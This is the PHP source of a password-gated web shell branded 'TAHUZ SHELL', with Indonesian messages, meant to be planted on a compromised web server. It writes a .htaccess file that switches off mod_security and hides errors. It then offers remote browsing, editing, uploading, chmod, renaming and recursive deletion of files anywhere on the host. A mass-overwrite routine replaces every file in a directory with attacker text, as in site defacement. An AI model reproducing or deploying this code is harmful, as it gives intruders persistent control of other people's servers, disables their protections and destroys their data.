session_start();

$hashedPassword = "a326756b647320f76f766590e2dc3a34"; // e3bd470e3f07385023ac115081482bce

if (isset($_GET['tahuz']) && !isset($_SESSION['loggedin'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (md5($_POST['pass']) === $hashedPassword) {
$_SESSION['loggedin'] = true;
header("Location: " . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
} else {
echo "<p style='color:red'>Ngetik Yang Bener Dek !</p>";
}
}
echo '



';
exit;
}

if (!isset($_SESSION['loggedin'])) {
http_response_code(403);
echo "Didnt have access!";
exit;
}

// Konten rahasia dimulai di sini
echo "Selamat datang, Anda berhasil login.";
$title = @get_current_user();

<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
<?php print $title ?> | <?php print @cwd() ?><title> print $title | print @cwd() </title>
<style type="text/css">
body {
font-family:Ubuntu Mono,serif;
color:#ddd;
} div.filemanager {
width:80%;
background:#1c1c1c;
border-radius:5px;
padding:7px;
box-shadow:0px 0px 10px black;
} select.filemanager {
font-family:Ubuntu Mono,serif;
width:100%;
padding:4.5px;
border-radius:3px;
background:#444;
border:1px solid #444;
color:#4C83AF;
} a {
color:#4C83AF;
text-decoration:none;
} a.file {
background:transparent;
width:100%;
height:400px;
color:#fff;
resize:none;
border:1px solid #444;
} textarea.filemanager {
width:100%;
border-radius:3px;
height:400px;
background:#444;
color:#ddd;
border:1px solid #444;
font-family:Ubuntu Mono,serif;
box-shadow:0px 0px 5px #444;
} input[type=submit].filemanager {
background:#444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
color:#fff;
font-weight:bold;
border:1px solid #444;
padding:5px;
} th {
padding:3px;
} div.success {
background:green;
border-radius:3px;
text-align:center;
padding:5px;
} div.failed {
background:red;
border-radius:3px;
text-align:center;
padding:5px;
} tr.hover:hover {
background:#555;
} .icon {
width:23px;
height:23px;
} input[type=submit]:hover {
cursor:pointer;
} input[type=text].filemanager {
background:#444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
border:1px solid #444;
padding:5px;
color:#fff;
} .action {
text-align:center;
font-weight:bold;
font-size:17px;
} span.filemanager {
padding:5px;
} td.filemanager {
padding:7px;
} input[type=file] {
background:#444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
} input[type=submit].file {
border:3px solid #444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
width:150px;
background:#444;
color:#fff;
font-weight:bold;
} td.filemanager {
padding:0px 5px;
width:600px;
} td.action {
width:50px;
} select.action {
color:#ddd;
} table.high {
background:#ddd;
border:1px solid #ddd;
padding:0px 5px;
} a.home {
font-size:30px;
} table, tr, td {
padding:5px;
border:1px solid #303030;
border-collapse:collapse;
border-spacing:0;
}
</style>

error_reporting(0);
@define("SEP", @DIRECTORY_SEPARATOR);
@define("PATH", @cwd());
$FILEPATH = @str_replace($_SERVER['DOCUMENT_ROOT'], "", PATH);
function view($post, $filename) {
if ($_GET['do'] == $post) {
if(file_exists($filename) && is_file($filename)) {
$code = highlight_file($filename, true);
$counter = 1;
$arr = explode('<br />', $code);
echo '<table class="high" border="0" width="100%" style="font-family: monospace;">' . "\r\n";
foreach($arr as $line) {
echo '<tr style="border:none">' . "\r\n";

if((strstr($line, '<span style="color: #FF8000">/*') !== false) && (strstr($line, '*/') !== false)) {
$comments = false;
$startcolor = "orange";
} elseif(strstr($line, '<span style="color: #FF8000">/*') !== false) {
$startcolor = "orange";
$comments = true;
} else {
$startcolor = "green";
if($comments) {
if(strstr($line, '*/') !== false) {
$comments = false;
$startcolor = "orange";
} else {
$comments = true;
}
} else {
$comments = false;
$startcolor = "green";
}
} if($comments)
echo '<td width="100%" nowrap style="color: orange;border:none">' . $line . '' . "\r\n";
else
echo '<td width="100%" nowrap style="color: ' . $startcolor . ';border:none">' . $line . '' . "\r\n";
echo '' . "\r\n";
$counter++;
}
echo '' . "\r\n";
} else {
echo "<p>The file <i>$filename</i> could not be opened.</p>\r\n";
return;
} exit();
}
}
@view("view", $_GET['file']);


<div class="filemanager">
<table class="filemanager" width="100%">

$text = "<IfModule mod_security.c>
SecRuleEngine Off
SecFilterInheritance Off
SecFilterEngine Off
</IfModule>";
$file = @fopen(".htaccess", "w");
@fwrite($file, $text);
@fclose($file);
function cwd() {
if (isset($_GET['path'])) {
$cwd = @str_replace('\\', '/', $_GET['path']);
@chdir($cwd);
} else {
$cwd = @str_replace('\\', '/', @getcwd());
} return $cwd;
} function pwd() {
$dir = @explode("/", @cwd());
foreach ($dir as $key => $pwd) {
print("<a href='?path=");
for ($i=0; $i <= $key ; $i++) {
print($dir[$i]);
if ($i != $key) {
print("/");
}
} print("'>".$pwd."</a>/");
}
} function perms($filename) {
$perms = fileperms($filename);
switch ($perms & 0xF000) {
case 0xC000: // socket
$info = 's';
break;
case 0xA000: // symbolic link
$info = 'l';
break;
case 0x8000: // regular
$info = 'r';
break;
case 0x6000: // block special
$info = 'b';
break;
case 0x4000: // directory
$info = 'd';
break;
case 0x2000: // character special
$info = 'c';
break;
case 0x1000: // FIFO pipe
$info = 'p';
break;
default: // unknown
$info = 'u';
} $info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
} function permission($filename, $perms) {
if (!is_writable($filename)) {
<font color="red"> print $perms </font>
} else {
<font color="green"> print $perms </font>
}
} function action($typePost, $typeFile, $filename, $value) {
$action = "<option value='?path=".PATH."&do=".$typePost."&".$typeFile."=".$filename."'>".$value."</option>";
return $action;
} function tools($toolsname, $value) {
$tools = "<option value='?path=".PATH."&".$toolsname."'>".$value."</option>";
return $tools;
} function redirect($path, $cwd) {

<script type="text/javascript">
window.location='? print $path = print $cwd ';
</script>

} function success($text) {

<div class="success"> print $text </div>

} function failed($text) {

<div class="failed"> print $text </div>

} function back($dir, $value) {
$back = "<option value='?path=".$dir."'>".$value."</option>";
return $back;
} function getPath() {
$getPath = @scandir(PATH);
return $getPath;
} function size($filename) {
$size = @filesize($filename)/1024;
$size = @round($size, 3);
if ($size > 1024) {
$size = @round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
} return $size;
} function backup($post, $filename) {
if ($_GET['do'] == $post) {
$file = @file_get_contents($filename);
$fp = @fopen($filename.".bak", "w");
@fwrite($fp, $file);
@fclose($fp);
}
} function deleteAllFiles($dir, $text, $filename) {
$getFile = @scandir($dir);
foreach ($getFile as $file) {
if ($file != "." && $file != ".." ) {
$noDelete = @array(@basename(__FILE__), $filename);
if (in_array($file, $noDelete)) {
continue;
}
$fp = @fopen($dir.DIRECTORY_SEPARATOR.$file, "w");
if (@fwrite($fp, $text)) {



print $dir.DIRECTORY_SEPARATOR.$file
<span class="ok">OK</span>



}
}
}
}
if (isset($_POST['submit'])) {
@deleteAllFiles($_POST['dir'], $_POST['text'], $_POST['filename']);
}


function makefile($post) {
if (isset($_GET[$post])) {
$filename = $_POST['filename'];


<th>
<a onclick="window.location='?path= print PATH '">MAKE FILE</a>
</th>


if (isset($_POST['submit'])) {
$fp = @fopen($filename, "w");
if (@fwrite($fp, $_POST['text'])) {


print @success("Create file ".$filename." Successfully")


} else {


print @failed("Create file ".$filename." Failed")


}
}


<tr class="filemanager">




<tr class="filemanager">

<textarea class="filemanager" name="text">TAHUZ SHELL</textarea>


<tr class="filemanager">






exit();
}
} function makedir($post) {
if (isset($_GET[$post])) {
if (isset($_POST['submit'])) {
$dirname = $_POST['dirname'];
if (@mkdir($dirname)) {
@success("Create dir ".$dirname." Successfully");
} else {
@failed("Create dir ".$dirname." Failed");
}
}



<th>
<a onclick="window.location='?path= print PATH '">MAKE DIR</a>
</th>

<tr class="filemanager">











exit();
}
} function changeMode($post, $filename) {
if ($_GET['do'] == $post) {


<th><a onclick="window.location='?path= print PATH '">CHANGE MODE</a></th>


if (isset($_POST['submit'])) {
if (@chmod($filename, $_POST['mode'])) {


print @success("Change file ".@substr(sprintf('%o', @fileperms($filename)), -4)." to ".$_POST['mode']." Successfully")


} else {


print @failed("Change file Failed")


}
}


<tr class="filemanager">




<tr class="filemanager">






exit();
}
} function copyFile($post, $filename) {
if ($_GET['do'] == $post) {
if (isset($_POST['submit'])) {
if (@copy($filename, $_POST['to'])) {
@success("File ".$filename." Copied to ".$_POST['to']."");
} else {
@failed("File ".$filename." Copied Failed");
}
}



<th colspan="2">
Copy File
</th>

<tr class="filemanager">



<td style="width:100px;">
<select class="filemanager" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("edit", "file", $filename, "Edit")
print @action("rename", "file", $filename, "Rename")
print @action("delete", "file", $filename, "Delete")
print @back(PATH, "BACK")
</select>


<tr class="filemanager">
<td colspan="2">



<tr class="filemanager">
<td colspan="2">





exit();
}
} function delete($filename) {
if (@is_dir($filename)) {
$scandir = @scandir($filename);
foreach ($scandir as $object) {
if ($object != '.' && $object != '..') {
if (@is_dir($filename.SEP.$object)) {
@delete($filename.SEP.$object);
} else {
@unlink($filename.SEP.$object);
}
}
} if (@rmdir($filename)) {
return true;
} else {
return false;
}
} else {
if (@unlink($filename)) {
return true;
} else {
return false;
}
}
} function edit($post, $filename) {
if ($_GET['do'] == $post) {


<th colspan="2">FILE EDITOR</th>


if (isset($_POST['submit'])) {
$fp = @fopen($filename, 'w');
if (@fwrite($fp, $_POST['text'])) {
<td colspan="2"> @success("Success");
} else {
<td colspan="2"> @failed("Failed");
}
} $text = @htmlspecialchars(@file_get_contents($filename));


<tr class="filemanager">
<td class="filemanager">
<span class="filemanager"> [ Filename :
print @permission($filename, $filename) ]
[ Size : print @permission($filename, @size($filename)) ]
</span>

<td style="width:50px;">
<select class="filemanager" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("view", "file", $filename, "Highlight")
print @action("rename", "file", $filename, "Rename")
print @action("delete", "file", $filename, "Delete")
print @action("copy", "file", $filename, "Copy")
print @back(PATH, "BACK")
</select>


<tr class="filemanager">
<td colspan="2">
<textarea class="filemanager" name="text" placeholder="Nothing Script"> print $text </textarea>


<tr class="filemanager">
<td colspan="2">





exit();
}
} function renames($post, $filename) {
if ($_GET['do'] == $post) {


<th colspan="2">RENAME</th>


if (isset($_POST['submit'])) {
$renames = @rename($filename, $_POST['newname']);
if ($renames) {
@redirect("path", PATH);
} else {
<td colspan="2"> @failed("Failed");
}
}


<tr class="filemanager">




<select class="filemanager" onclick="if (this.value) window.location=(this.value)">
<option selected></option>
print @action("edit", "file", $filename, "Edit")
print @action("delete", "file", $filename, "Delete")
print @back(PATH, "BACK")
</select>


<tr class="filename">
<td colspan="2">





exit();
}
}

// Action
@edit("edit", $_GET['file']);
if ($_GET['do'] == 'delete') {
@delete($_GET['file']);
}
@renames("rename", $_GET['file']);
@backup("backup", $_GET['file']);
@copyFile("copy", $_GET['file']);
@changeMode("chmod", $_GET['file']);
@makefile("makefile");
@makedir("makedir");



<th colspan="4">
<a class="home" href=" print $_SERVER['SCRIPT_NAME'] ">TAHUZ</a>
</th>


<td colspan="4">

System : print @Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64




<td colspan="4">

if (isset($_POST['submit'])) {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
@success("Upload at =>
<a href='".$GLOBALS['FILEPATH']."/".$_FILES['file']['name']."' target='_blank'>
".$_FILES['file']['name']."</a>");
} else {
@failed("Upload Failed");
}
}









<tr class="filemanager">
<th colspan="4"> print @pwd() </th>

<tr class="filemanager">
<th>Filename</th>
<th>Permission</th>
<th>Size</th>
<th style="width:90px;">
<select class="filemanager action" onclick="if (this.value)window.location=(this.value)">
<option value="" selected>Action</option>
print @tools("makefile", "Make File")
print @tools("makedir", "Make Dir")
</select>
</th>


if(!is_dir(PATH)) die("<td colspan='4'>
<font color='red'>Directory '".PATH."' is not exists.</font></>");
if(!is_readable(PATH)) die("<td colspan='4'>
<font color='red'>Directory '".PATH."' not readable.</font></>");
foreach (@getPath() as $dir) {
if (!is_dir($dir)) continue;
if ($dir === '.' || $dir === '..') continue;

<tr class="filemanager hover">
<td class="filemanager">
<img src='http://nzsc.xtgem.com/folder.png' width=15px>
<a href="?path= print PATH.SEP.$dir "> print $dir </a>

print @permission($dir, @perms($dir))

--

<td class="action">
<select class="path" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("delete", "file", $dir, "Delete")
print @action("rename", "file", $dir, "Rename")
</select>



}
foreach (@getPath() as $file) {
if (!is_file($file)) continue;

<tr class="filemanager hover">
<td class="filemanager">
<img src='http://nzsc.xtgem.com/file2.png' width=15px>
<a href=" print $GLOBALS['FILEPATH'] / print $file " target='_blank'> print $file </a>


<a href="?path= print PATH &do=chmod&file= print $file "> print @permission($file, @perms($file)) </a>

print @size($file)

<td style="width:50px;">
<select class="path" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("edit", "file", $file, "Edit")
print @action("delete", "file", $file, "Delete")
print @action("rename", "file", $file, "Rename")
print @action("backup", "file", $file, "Backup")
print @action("copy", "file", $file, "Copy")
</select>




}


<th colspan="4">
&copy; print @date("Y") - TAHUZ |

$file = @scandir(@cwd());
$count = @count($file)-2;
if (!is_file($file)) {
print("Files : ".$count."");
}

</th>


</div>